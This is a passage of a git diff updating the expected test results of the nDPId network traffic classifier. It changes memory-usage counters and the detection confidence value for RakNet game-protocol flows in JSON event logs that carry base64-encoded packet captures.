+00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-payload-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1429000385363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 155/155 ~~ skipped flows.............: 0 @@ -127,9 +126,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5900352 bytes -~~ total memory freed........: 5900352 bytes -~~ total allocations/frees...: 118402/118402 +~~ total memory allocated....: 6033986 bytes +~~ total memory freed........: 6033986 bytes +~~ total allocations/frees...: 121164/121164 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2367 chars diff --git a/test/results/radius_false_positive.pcapng.out b/test/results/radius_false_positive.pcapng.out index b4f6c74be..c937bedec 100644 --- a/test/results/radius_false_positive.pcapng.out +++ b/test/results/radius_false_positive.pcapng.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 479 chars ~~ json string max len.......: 2155 chars diff --git a/test/results/raknet.pcap.out b/test/results/raknet.pcap.out index 7df550f8e..4e5f03c9b 100644 --- a/test/results/raknet.pcap.out +++ b/test/results/raknet.pcap.out @@ -4,69 +4,69 @@ 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946711624286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946711624286,"pkt":"eJS0JASgYDjgxTWgCABFAAXUl7RAAD8RIvLAqAJklJkjza3V6n4FwDU+BQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946711624328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946711624328,"pkt":"YDjgxTWgeJS0JASgCABFAAA4I79AADcRpIOUmSPNwKgCZOp+rdUAJGm+BgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgUiIAAF1A=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946711624332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946711624332,"pkt":"eJS0JASgYDjgxTWgCABFAAA+l7ZAAD8RKIbAqAJklJkjza3V6n4AKr6IBwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup+AkAAAAAASQ8CfA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711624286,"flow_last_seen":946711624332,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711624332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711624286,"flow_last_seen":946711624332,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711624332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946711673443,"flow_last_seen":946711673443,"flow_idle_time":200000,"flow_min_l4_payload_len":1464,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":1464,"midstream":0,"thread_ts_msec":946711673443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946711673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946711673443,"pkt":"eJS0JASgYDjgxTWgCABFAAXUsU1AAD8RCVnAqAJklJkjze0R6nwFwPYDBQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946711673461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946711673461,"pkt":"YDjgxTWgeJS0JASgCABFAAA4cDJAADcRWBCUmSPNwKgCZOp87REAJFSIBgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgUd9gAF1A=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946711673464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946711673464,"pkt":"eJS0JASgYDjgxTWgCABFAAA+sU9AAD8RDu3AqAJklJkjze0R6nwAKn9QBwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup8AkAAAAAASQ8CfA=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711673443,"flow_last_seen":946711673464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711673464,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711673443,"flow_last_seen":946711673464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711673464,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":946713048252} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048252,"flow_last_seen":946713048252,"flow_idle_time":200000,"flow_min_l4_payload_len":1464,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":1464,"midstream":0,"thread_ts_msec":946713048252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946713048252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946713048252,"pkt":"eJS0JASgYDjgxTWgCABFAAXUUWdAAD8RaT\/AqAJklJkjzYC36nUFwGJlBQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946713048272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048272,"pkt":"YDjgxTWgeJS0JASgCABFAAA45d9AADgR4WKUmSPNwKgCZOp1gLcAJA72BgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqAAF1A=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946713048274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048274,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC36nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048252,"flow_last_seen":946713048274,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946713048274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048252,"flow_last_seen":946713048274,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946713048274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946713048361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048361,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946713048363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048363,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946713048365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048365,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048389,"flow_last_seen":946713048389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 